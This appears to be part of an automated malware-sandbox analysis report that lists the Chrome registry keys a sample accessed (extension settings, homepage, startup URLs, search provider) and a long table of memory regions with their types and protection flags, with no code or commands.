HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
kmendfapggjehodndflmmgagdbamhnfd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mfehgcgbbipciphmccgaenjidiccnmng
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
mhjfbmdgcfjbbpaeojofohoefgiehjai
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
neajdppkdcdipfabeoofebfddakdcjhd
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nkeimhogjdpnpccoofpliimaahmaaome
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Google\Update\ClientStateMedium\{8A69D345-D564-463C-AFF1-A69D9E530F96}\LastWasDefault
|
S-1-5-21-3853321935-2125563209-4053062332-1002
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
gfdkimpbcpahaombhbimeihdjnejgicl
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
pkedcjkdefgpdelpbcmbmeomcjbeemfm
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default\extensions.settings
|
nmmhkkegccagdldgiimedpiccmgmieda
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\ThirdParty
|
StatusCodes
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon
|
state
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
dr
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.reporting
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
module_blacklist_cache_md5_digest
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
media.storage_id_salt
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.account_id
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_seed
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
default_search_provider_data.template_url_data
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
safebrowsing.incidents_sent
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
pinned_tabs
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
search_provider_overrides
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_default_search
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
prefs.preference_reset_time
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
google.services.last_username
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
session.restore_on_startup
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
software_reporter.prompt_version
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.last_triggered_for_startup_urls
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
settings_reset_prompt.prompt_wave
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
homepage_is_newtabpage
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\PreferenceMACs\Default
|
browser.show_home_button
|
||
|
HKEY_CURRENT_USER\Software\Google\Chrome\StabilityMetrics
|
user_experience_metrics.stability.exited_cleanly
|
||
|
HKEY_CURRENT_USER\Software\Google\Update\ClientState\{8A69D345-D564-463c-AFF1-A69D9E530F96}
|
lastrun
|
There are 37 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
29E7FC40000
|
trusted library allocation
|
page read and write
|
||
|
29E7FEFC000
|
heap
|
page read and write
|
||
|
28704210000
|
heap
|
page read and write
|
||
|
1F20F863000
|
heap
|
page read and write
|
||
|
26451A10000
|
heap
|
page read and write
|
||
|
29EE0C42000
|
heap
|
page read and write
|
||
|
1DBE7593000
|
heap
|
page read and write
|
||
|
C48CE7E000
|
stack
|
page read and write
|
||
|
1F0DD713000
|
heap
|
page read and write
|
||
|
5F24279000
|
stack
|
page read and write
|
||
|
29E7FF19000
|
heap
|
page read and write
|
||
|
29E7AF59000
|
heap
|
page read and write
|
||
|
1F20F866000
|
heap
|
page read and write
|
||
|
29E7A580000
|
heap
|
page read and write
|
||
|
29E7FEAD000
|
heap
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
28708D60000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C5F000
|
heap
|
page read and write
|
||
|
244EC5A9000
|
heap
|
page read and write
|
||
|
C48C9CE000
|
stack
|
page read and write
|
||
|
1F20F902000
|
heap
|
page read and write
|
||
|
1DBE7565000
|
heap
|
page read and write
|
||
|
1DBE758D000
|
heap
|
page read and write
|
||
|
36126FB000
|
stack
|
page read and write
|
||
|
29E7FC80000
|
trusted library allocation
|
page read and write
|
||
|
1DBE75B8000
|
heap
|
page read and write
|
||
|
29EE1402000
|
trusted library allocation
|
page read and write
|
||
|
29EE0B90000
|
trusted library allocation
|
page read and write
|
||
|
611D3FE000
|
stack
|
page read and write
|
||
|
1E266429000
|
heap
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
C48C8CB000
|
stack
|
page read and write
|
||
|
244EC241000
|
heap
|
page read and write
|
||
|
244ED090000
|
trusted library allocation
|
page read and write
|
||
|
22CF6EC0000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
29E00150000
|
trusted library allocation
|
page read and write
|
||
|
28704155000
|
heap
|
page read and write
|
||
|
29E7FD70000
|
trusted library allocation
|
page read and write
|
||
|
29EE0D02000
|
heap
|
page read and write
|
||
|
4B435FF000
|
stack
|
page read and write
|
||
|
29EE0C4A000
|
heap
|
page read and write
|
||
|
29E7FC4C000
|
trusted library allocation
|
page read and write
|
||
|
29E7AD40000
|
trusted library allocation
|
page read and write
|
||
|
1F0DD668000
|
heap
|
page read and write
|
||
|
29E7A68D000
|
heap
|
page read and write
|
||
|
29E7FB30000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7589000
|
heap
|
page read and write
|
||
|
611D2FB000
|
stack
|
page read and write
|
||
|
5F2417E000
|
stack
|
page read and write
|
||
|
1DBE7574000
|
heap
|
page read and write
|
||
|
287043DE000
|
heap
|
page read and write
|
||
|
678C93B000
|
stack
|
page read and write
|
||
|
5F243F9000
|
stack
|
page read and write
|
||
|
D7374FE000
|
stack
|
page read and write
|
||
|
29E7BA90000
|
trusted library allocation
|
page read and write
|
||
|
29E7FEDF000
|
heap
|
page read and write
|
||
|
29E7FEFC000
|
heap
|
page read and write
|
||
|
29E7FEA9000
|
heap
|
page read and write
|
||
|
29E7FE1E000
|
heap
|
page read and write
|
||
|
29E7FC70000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7596000
|
heap
|
page read and write
|
||
|
29E7A63F000
|
heap
|
page read and write
|
||
|
29E7FDA0000
|
remote allocation
|
page read and write
|
||
|
678D67F000
|
stack
|
page read and write
|
||
|
1DBE75D7000
|
heap
|
page read and write
|
||
|
1DBE7270000
|
remote allocation
|
page read and write
|
||
|
1FB3C840000
|
heap
|
page read and write
|
||
|
22816278000
|
heap
|
page read and write
|
||
|
FDB9F7E000
|
stack
|
page read and write
|
||
|
22816263000
|
heap
|
page read and write
|
||
|
26452402000
|
trusted library allocation
|
page read and write
|
||
|
1FB3C8A2000
|
heap
|
page read and write
|
||
|
1E266413000
|
heap
|
page read and write
|
||
|
29E7FC40000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C7B000
|
heap
|
page read and write
|
||
|
22816202000
|
heap
|
page read and write
|
||
|
1F0DD4F0000
|
heap
|
page read and write
|
||
|
29E7A69F000
|
heap
|
page read and write
|
||
|
244ED0C0000
|
trusted library allocation
|
page read and write
|
||
|
22CF705C000
|
heap
|
page read and write
|
||
|
1DBE758D000
|
heap
|
page read and write
|
||
|
29E7FAE0000
|
trusted library allocation
|
page read and write
|
||
|
22816302000
|
heap
|
page read and write
|
||
|
29E7FAE3000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C41000
|
heap
|
page read and write
|
||
|
1C6EB25E000
|
heap
|
page read and write
|
||
|
29E7A613000
|
heap
|
page read and write
|
||
|
1DBE75AB000
|
heap
|
page read and write
|
||
|
411FC7D000
|
stack
|
page read and write
|
||
|
29E7FDA0000
|
remote allocation
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
29E7FC4E000
|
trusted library allocation
|
page read and write
|
||
|
5F240FF000
|
stack
|
page read and write
|
||
|
29EE0C20000
|
heap
|
page read and write
|
||
|
1E266502000
|
heap
|
page read and write
|
||
|
29EE0C5C000
|
heap
|
page read and write
|
||
|
29E7AF9B000
|
heap
|
page read and write
|
||
|
1DBE756E000
|
heap
|
page read and write
|
||
|
1E266513000
|
heap
|
page read and write
|
||
|
29E7FC4B000
|
trusted library allocation
|
page read and write
|
||
|
5F2437E000
|
stack
|
page read and write
|
||
|
1C6EB270000
|
heap
|
page read and write
|
||
|
29E7FD10000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C72000
|
heap
|
page read and write
|
||
|
29E7FC70000
|
trusted library allocation
|
page read and write
|
||
|
287041AE000
|
heap
|
page read and write
|
||
|
2281627B000
|
heap
|
page read and write
|
||
|
26451C67000
|
heap
|
page read and write
|
||
|
1DBE75C1000
|
heap
|
page read and write
|
||
|
22CF7000000
|
heap
|
page read and write
|
||
|
228161C0000
|
trusted library allocation
|
page read and write
|
||
|
26451C5D000
|
heap
|
page read and write
|
||
|
29EE0C7E000
|
heap
|
page read and write
|
||
|
1DBE7591000
|
heap
|
page read and write
|
||
|
26451C58000
|
heap
|
page read and write
|
||
|
244ECDD0000
|
trusted library allocation
|
page read and write
|
||
|
1DBE75B3000
|
heap
|
page read and write
|
||
|
244EC5A0000
|
heap
|
page read and write
|
||
|
3612AFD000
|
stack
|
page read and write
|
||
|
29E7AF29000
|
heap
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
1DBE754B000
|
heap
|
page read and write
|
||
|
22CF7013000
|
heap
|
page read and write
|
||
|
29EE0C45000
|
heap
|
page read and write
|
||
|
244ED0B0000
|
trusted library allocation
|
page read and write
|
||
|
29E7FC45000
|
trusted library allocation
|
page read and write
|
||
|
29E7FEF0000
|
heap
|
page read and write
|
||
|
1F20F860000
|
heap
|
page read and write
|
||
|
1F0DD65A000
|
heap
|
page read and write
|
||
|
29E7AF9B000
|
heap
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
29E7A5E0000
|
heap
|
page read and write
|
||
|
1F20F7C0000
|
trusted library allocation
|
page read and write
|
||
|
287041BA000
|
heap
|
page read and write
|
||
|
1E2663F0000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C74000
|
heap
|
page read and write
|
||
|
26451C5C000
|
heap
|
page read and write
|
||
|
29E7BA93000
|
trusted library allocation
|
page read and write
|
||
|
1F20F82D000
|
heap
|
page read and write
|
||
|
678D47F000
|
stack
|
page read and write
|
||
|
29E7FAB0000
|
trusted library allocation
|
page read and write
|
||
|
1F20F800000
|
heap
|
page read and write
|
||
|
29E7AFDC000
|
heap
|
page read and write
|
||
|
29E7FD80000
|
trusted library allocation
|
page read and write
|
||
|
D123277000
|
stack
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
29EE0C2F000
|
heap
|
page read and write
|
||
|
1F0DD602000
|
heap
|
page read and write
|
||
|
1E266444000
|
heap
|
page read and write
|
||
|
29E7B5F0000
|
trusted library allocation
|
page read and write
|
||
|
678D0FC000
|
stack
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
36127FE000
|
stack
|
page read and write
|
||
|
1DBE7A03000
|
heap
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
1C6EB050000
|
heap
|
page read and write
|
||
|
4B42FEE000
|
stack
|
page read and write
|
||
|
26451C2F000
|
heap
|
page read and write
|
||
|
1C6EB313000
|
heap
|
page read and write
|
||
|
29E7A67C000
|
heap
|
page read and write
|
||
|
1DBE75B8000
|
heap
|
page read and write
|
||
|
1C6EB229000
|
heap
|
page read and write
|
||
|
C834FCE000
|
stack
|
page read and write
|
||
|
29E7BAA0000
|
trusted library allocation
|
page read and write
|
||
|
C8355FE000
|
stack
|
page read and write
|
||
|
D122BEE000
|
stack
|
page read and write
|
||
|
FDB96FA000
|
stack
|
page read and write
|
||
|
26451C66000
|
heap
|
page read and write
|
||
|
287041BA000
|
heap
|
page read and write
|
||
|
854D97F000
|
stack
|
page read and write
|
||
|
D73747E000
|
stack
|
page read and write
|
||
|
29E7A600000
|
heap
|
page read and write
|
||
|
29E7A570000
|
heap
|
page read and write
|
||
|
411FAFD000
|
stack
|
page read and write
|
||
|
C48C94E000
|
stack
|
page read and write
|
||
|
1DBE7596000
|
heap
|
page read and write
|
||
|
678D07E000
|
stack
|
page read and write
|
||
|
678D37C000
|
stack
|
page read and write
|
||
|
22816120000
|
heap
|
page read and write
|
||
|
29EE0C6B000
|
heap
|
page read and write
|
||
|
29E7FC80000
|
trusted library allocation
|
page read and write
|
||
|
22816229000
|
heap
|
page read and write
|
||
|
29E7FF04000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
287040E0000
|
heap
|
page read and write
|
||
|
411F87C000
|
stack
|
page read and write
|
||
|
1DBE7A20000
|
heap
|
page read and write
|
||
|
29E7FC40000
|
trusted library allocation
|
page read and write
|
||
|
1F0DD63C000
|
heap
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
1F20F900000
|
heap
|
page read and write
|
||
|
C8352FB000
|
stack
|
page read and write
|
||
|
1DBE75C4000
|
heap
|
page read and write
|
||
|
1C6EB213000
|
heap
|
page read and write
|
||
|
29EE0C3A000
|
heap
|
page read and write
|
||
|
22816269000
|
heap
|
page read and write
|
||
|
29E7FC46000
|
trusted library allocation
|
page read and write
|
||
|
29E7A658000
|
heap
|
page read and write
|
||
|
29E7FC46000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C31000
|
heap
|
page read and write
|
||
|
3612EFF000
|
stack
|
page read and write
|
||
|
29E7FC41000
|
trusted library allocation
|
page read and write
|
||
|
D7373FF000
|
stack
|
page read and write
|
||
|
29E7FC4B000
|
trusted library allocation
|
page read and write
|
||
|
1C6EB267000
|
heap
|
page read and write
|
||
|
29E7AE15000
|
heap
|
page read and write
|
||
|
29EE0A90000
|
heap
|
page read and write
|
||
|
1DBE7580000
|
heap
|
page read and write
|
||
|
1E266D00000
|
heap
|
page read and write
|
||
|
287041BB000
|
heap
|
page read and write
|
||
|
1E2664CA000
|
heap
|
page read and write
|
||
|
C8353FB000
|
stack
|
page read and write
|
||
|
29E7FF07000
|
heap
|
page read and write
|
||
|
1DBE757E000
|
heap
|
page read and write
|
||
|
29E7FF5A000
|
heap
|
page read and write
|
||
|
28704119000
|
heap
|
page read and write
|
||
|
1C6EB270000
|
heap
|
page read and write
|
||
|
1DBE7576000
|
heap
|
page read and write
|
||
|
1FB3C882000
|
heap
|
page read and write
|
||
|
22CF7057000
|
heap
|
page read and write
|
||
|
1C6EB25C000
|
heap
|
page read and write
|
||
|
4B42F6E000
|
stack
|
page read and write
|
||
|
29E7FF06000
|
heap
|
page read and write
|
||
|
29E7AFDD000
|
heap
|
page read and write
|
||
|
29E7FC47000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7A03000
|
heap
|
page read and write
|
||
|
287041FC000
|
heap
|
page read and write
|
||
|
287041FC000
|
heap
|
page read and write
|
||
|
1FB3C871000
|
heap
|
page read and write
|
||
|
29E7FE11000
|
heap
|
page read and write
|
||
|
29E7AF58000
|
heap
|
page read and write
|
||
|
29E7FC4F000
|
trusted library allocation
|
page read and write
|
||
|
1FB3C884000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
1C6EB25B000
|
heap
|
page read and write
|
||
|
1DBE75AB000
|
heap
|
page read and write
|
||
|
29EE0C5A000
|
heap
|
page read and write
|
||
|
29E7AD50000
|
trusted library section
|
page read and write
|
||
|
29E7AF9B000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
22816313000
|
heap
|
page read and write
|
||
|
29E7AFDB000
|
heap
|
page read and write
|
||
|
1F20F8A2000
|
heap
|
page read and write
|
||
|
29E7FD90000
|
trusted library allocation
|
page read and write
|
||
|
244ED0A0000
|
heap
|
page readonly
|
||
|
1C6EB040000
|
heap
|
page read and write
|
||
|
244EC1B0000
|
heap
|
page read and write
|
||
|
854D87F000
|
stack
|
page read and write
|
||
|
29EE0C57000
|
heap
|
page read and write
|
||
|
1DBE75A3000
|
heap
|
page read and write
|
||
|
1DBE758C000
|
heap
|
page read and write
|
||
|
29EE0C6D000
|
heap
|
page read and write
|
||
|
1F0DD550000
|
heap
|
page read and write
|
||
|
29E7AE00000
|
heap
|
page read and write
|
||
|
29E7B710000
|
trusted library section
|
page readonly
|
||
|
26451B70000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
FDB94FE000
|
stack
|
page read and write
|
||
|
29E7FE5F000
|
heap
|
page read and write
|
||
|
29EE0C13000
|
heap
|
page read and write
|
||
|
244EC27E000
|
heap
|
page read and write
|
||
|
1F20F865000
|
heap
|
page read and write
|
||
|
FDB98FF000
|
stack
|
page read and write
|
||
|
29E7AF58000
|
heap
|
page read and write
|
||
|
29E7FC48000
|
trusted library allocation
|
page read and write
|
||
|
29E7AF9B000
|
heap
|
page read and write
|
||
|
29E7A713000
|
heap
|
page read and write
|
||
|
FDB9D7E000
|
stack
|
page read and write
|
||
|
1F20F88A000
|
heap
|
page read and write
|
||
|
29E7B101000
|
trusted library allocation
|
page read and write
|
||
|
5F242FC000
|
stack
|
page read and write
|
||
|
678D1FD000
|
stack
|
page read and write
|
||
|
26451C80000
|
heap
|
page read and write
|
||
|
26451C29000
|
heap
|
page read and write
|
||
|
22816A02000
|
trusted library allocation
|
page read and write
|
||
|
22816274000
|
heap
|
page read and write
|
||
|
1FB3C7C0000
|
heap
|
page read and write
|
||
|
29E7FF10000
|
heap
|
page read and write
|
||
|
29E001B0000
|
trusted library allocation
|
page read and write
|
||
|
26451C13000
|
heap
|
page read and write
|
||
|
29EE0C2D000
|
heap
|
page read and write
|
||
|
1E266290000
|
heap
|
page read and write
|
||
|
29E7B6E0000
|
trusted library section
|
page readonly
|
||
|
411F3BB000
|
stack
|
page read and write
|
||
|
29E7B400000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C3B000
|
heap
|
page read and write
|
||
|
29E7AF13000
|
heap
|
page read and write
|
||
|
1E266C02000
|
heap
|
page read and write
|
||
|
1F20F871000
|
heap
|
page read and write
|
||
|
29E7FF06000
|
heap
|
page read and write
|
||
|
22CF6F90000
|
remote allocation
|
page read and write
|
||
|
1DBE758D000
|
heap
|
page read and write
|
||
|
1DBE7582000
|
heap
|
page read and write
|
||
|
244EC150000
|
trusted library allocation
|
page read and write
|
||
|
287041E8000
|
heap
|
page read and write
|
||
|
26451D13000
|
heap
|
page read and write
|
||
|
29E00120000
|
trusted library allocation
|
page read and write
|
||
|
1C6EB200000
|
heap
|
page read and write
|
||
|
29E7A6FE000
|
heap
|
page read and write
|
||
|
4B434F7000
|
stack
|
page read and write
|
||
|
1F20F859000
|
heap
|
page read and write
|
||
|
29E7FEA9000
|
heap
|
page read and write
|
||
|
2870412E000
|
heap
|
page read and write
|
||
|
29E7FC40000
|
trusted library allocation
|
page read and write
|
||
|
26451D00000
|
heap
|
page read and write
|
||
|
29E7FC60000
|
trusted library allocation
|
page read and write
|
||
|
5F2407B000
|
stack
|
page read and write
|
||
|
1DBE758B000
|
heap
|
page read and write
|
||
|
D12347F000
|
stack
|
page read and write
|
||
|
C48D07F000
|
stack
|
page read and write
|
||
|
1F20F908000
|
heap
|
page read and write
|
||
|
22816258000
|
heap
|
page read and write
|
||
|
1FB3C886000
|
heap
|
page read and write
|
||
|
C8354F7000
|
stack
|
page read and write
|
||
|
29E7AF00000
|
heap
|
page read and write
|
||
|
1F20F83C000
|
heap
|
page read and write
|
||
|
28705AF0000
|
heap
|
page read and write
|
||
|
854D9F9000
|
stack
|
page read and write
|
||
|
1DBE6CAC000
|
heap
|
page read and write
|
||
|
36128FB000
|
stack
|
page read and write
|
||
|
1DBE757F000
|
heap
|
page read and write
|
||
|
1F20F842000
|
heap
|
page read and write
|
||
|
29E7A629000
|
heap
|
page read and write
|
||
|
1C6EB300000
|
heap
|
page read and write
|
||
|
1E266D32000
|
heap
|
page read and write
|
||
|
29E7AF9C000
|
heap
|
page read and write
|
||
|
29EE0C7A000
|
heap
|
page read and write
|
||
|
29E7FE42000
|
heap
|
page read and write
|
||
|
287041C2000
|
heap
|
page read and write
|
||
|
26451C8A000
|
heap
|
page read and write
|
||
|
1DBE759B000
|
heap
|
page read and write
|
||
|
287041E9000
|
heap
|
page read and write
|
||
|
854D8FE000
|
stack
|
page read and write
|
||
|
1FB3C891000
|
heap
|
page read and write
|
||
|
36122CB000
|
stack
|
page read and write
|
||
|
411F9FE000
|
stack
|
page read and write
|
||
|
1F0DD580000
|
trusted library allocation
|
page read and write
|
||
|
29E7FD60000
|
trusted library allocation
|
page read and write
|
||
|
29E7FAA0000
|
trusted library allocation
|
page read and write
|
||
|
22CF7040000
|
heap
|
page read and write
|
||
|
29E7AF9C000
|
heap
|
page read and write
|
||
|
29E7AF9B000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
2281625C000
|
heap
|
page read and write
|
||
|
22CF7102000
|
heap
|
page read and write
|
||
|
29E7FEFD000
|
heap
|
page read and write
|
||
|
1FB3C8A3000
|
heap
|
page read and write
|
||
|
29EE0C4E000
|
heap
|
page read and write
|
||
|
29E7A677000
|
heap
|
page read and write
|
||
|
29E7FF5A000
|
heap
|
page read and write
|
||
|
29E7A672000
|
heap
|
page read and write
|
||
|
1DBE7592000
|
heap
|
page read and write
|
||
|
4B436FF000
|
stack
|
page read and write
|
||
|
1F20F851000
|
heap
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
FDB9DFE000
|
stack
|
page read and write
|
||
|
29E7FE00000
|
heap
|
page read and write
|
||
|
29E7FD50000
|
trusted library allocation
|
page read and write
|
||
|
1C6EB258000
|
heap
|
page read and write
|
||
|
1F20F8A2000
|
heap
|
page read and write
|
||
|
FDB9BFE000
|
stack
|
page read and write
|
||
|
29EE0C46000
|
heap
|
page read and write
|
||
|
FDB9B7F000
|
stack
|
page read and write
|
||
|
29E7FF02000
|
heap
|
page read and write
|
||
|
1F0DD700000
|
heap
|
page read and write
|
||
|
29E7FF02000
|
heap
|
page read and write
|
||
|
1DBE6CE6000
|
heap
|
page read and write
|
||
|
FDB91EB000
|
stack
|
page read and write
|
||
|
29E7FE2C000
|
heap
|
page read and write
|
||
|
C8356FE000
|
stack
|
page read and write
|
||
|
1E2664BF000
|
heap
|
page read and write
|
||
|
1FB3C891000
|
heap
|
page read and write
|
||
|
26451D08000
|
heap
|
page read and write
|
||
|
FDB9C7F000
|
stack
|
page read and write
|
||
|
FDB97F9000
|
stack
|
page read and write
|
||
|
1F20F813000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
1C6EB27A000
|
heap
|
page read and write
|
||
|
854DA7F000
|
stack
|
page read and write
|
||
|
22CF7802000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
1DBE759A000
|
heap
|
page read and write
|
||
|
22816200000
|
heap
|
page read and write
|
||
|
D122E7E000
|
stack
|
page read and write
|
||
|
29E7B720000
|
trusted library section
|
page readonly
|
||
|
29EE0C75000
|
heap
|
page read and write
|
||
|
1E266488000
|
heap
|
page read and write
|
||
|
1DBE759A000
|
heap
|
page read and write
|
||
|
28705AF4000
|
heap
|
page read and write
|
||
|
1DBE758B000
|
heap
|
page read and write
|
||
|
29EE0C1E000
|
heap
|
page read and write
|
||
|
29E7B700000
|
trusted library section
|
page readonly
|
||
|
28705F50000
|
heap
|
page read and write
|
||
|
D12337F000
|
stack
|
page read and write
|
||
|
29E7AFDB000
|
heap
|
page read and write
|
||
|
1F0DD628000
|
heap
|
page read and write
|
||
|
29E7FB20000
|
trusted library allocation
|
page read and write
|
||
|
678CF7E000
|
stack
|
page read and write
|
||
|
287060A0000
|
heap
|
page read and write
|
||
|
FDBA07E000
|
stack
|
page read and write
|
||
|
29E00150000
|
trusted library allocation
|
page read and write
|
||
|
1E2664C4000
|
heap
|
page read and write
|
||
|
28705F91000
|
heap
|
page read and write
|
||
|
1DBE7270000
|
remote allocation
|
page read and write
|
||
|
29E000F0000
|
trusted library allocation
|
page read and write
|
||
|
29E7B6F0000
|
trusted library section
|
page readonly
|
||
|
29E7FDB0000
|
trusted library allocation
|
page read and write
|
||
|
29E7FF00000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
1FB3CBA0000
|
heap
|
page read and write
|
||
|
4B432FC000
|
stack
|
page read and write
|
||
|
29EE0C3D000
|
heap
|
page read and write
|
||
|
1F210002000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7590000
|
heap
|
page read and write
|
||
|
287043D0000
|
heap
|
page read and write
|
||
|
29E7BA71000
|
trusted library allocation
|
page read and write
|
||
|
29E000E0000
|
trusted library allocation
|
page read and write
|
||
|
29E7FDA0000
|
remote allocation
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
26451A70000
|
heap
|
page read and write
|
||
|
1DBE758C000
|
heap
|
page read and write
|
||
|
29E7FC61000
|
trusted library allocation
|
page read and write
|
||
|
1DBE756E000
|
heap
|
page read and write
|
||
|
611CDDB000
|
stack
|
page read and write
|
||
|
1C6EB259000
|
heap
|
page read and write
|
||
|
1F20F82A000
|
heap
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
244EC1D0000
|
heap
|
page read and write
|
||
|
1DBE7589000
|
heap
|
page read and write
|
||
|
29EE0C77000
|
heap
|
page read and write
|
||
|
28705A20000
|
heap
|
page read and write
|
||
|
29EE0C44000
|
heap
|
page read and write
|
||
|
244EC140000
|
heap
|
page read and write
|
||
|
29EE0C61000
|
heap
|
page read and write
|
||
|
29E7FC64000
|
trusted library allocation
|
page read and write
|
||
|
1DBE7589000
|
heap
|
page read and write
|
||
|
1F20F85A000
|
heap
|
page read and write
|
||
|
3612FFF000
|
stack
|
page read and write
|
||
|
1E266280000
|
heap
|
page read and write
|
||
|
1C6EBA02000
|
trusted library allocation
|
page read and write
|
||
|
1C6EB23C000
|
heap
|
page read and write
|
||
|
1FB3C876000
|
heap
|
page read and write
|
||
|
26451A00000
|
heap
|
page read and write
|
||
|
29E7AF9B000
|
heap
|
page read and write
|
||
|
C834ECB000
|
stack
|
page read and write
|
||
|
5F241FE000
|
stack
|
page read and write
|
||
|
411F8FE000
|
stack
|
page read and write
|
||
|
244EC5B0000
|
trusted library allocation
|
page read and write
|
||
|
1F0DD4E0000
|
heap
|
page read and write
|
||
|
244EC27E000
|
heap
|
page read and write
|
||
|
26451C5F000
|
heap
|
page read and write
|
||
|
244EC27E000
|
heap
|
page read and write
|
||
|
3612CFF000
|
stack
|
page read and write
|
||
|
1F20F913000
|
heap
|
page read and write
|
||
|
28704110000
|
heap
|
page read and write
|
||
|
4B42EEB000
|
stack
|
page read and write
|
||
|
29E7FD90000
|
trusted library allocation
|
page read and write
|
||
|
1DBE75B1000
|
heap
|
page read and write
|
||
|
29E7FF06000
|
heap
|
page read and write
|
||
|
1FB3C887000
|
heap
|
page read and write
|
||
|
1C6EB302000
|
heap
|
page read and write
|
||
|
1FB3C860000
|
heap
|
page read and write
|
||
|
29E7B6D0000
|
trusted library section
|
page readonly
|
||
|
1DBE75A2000
|
heap
|
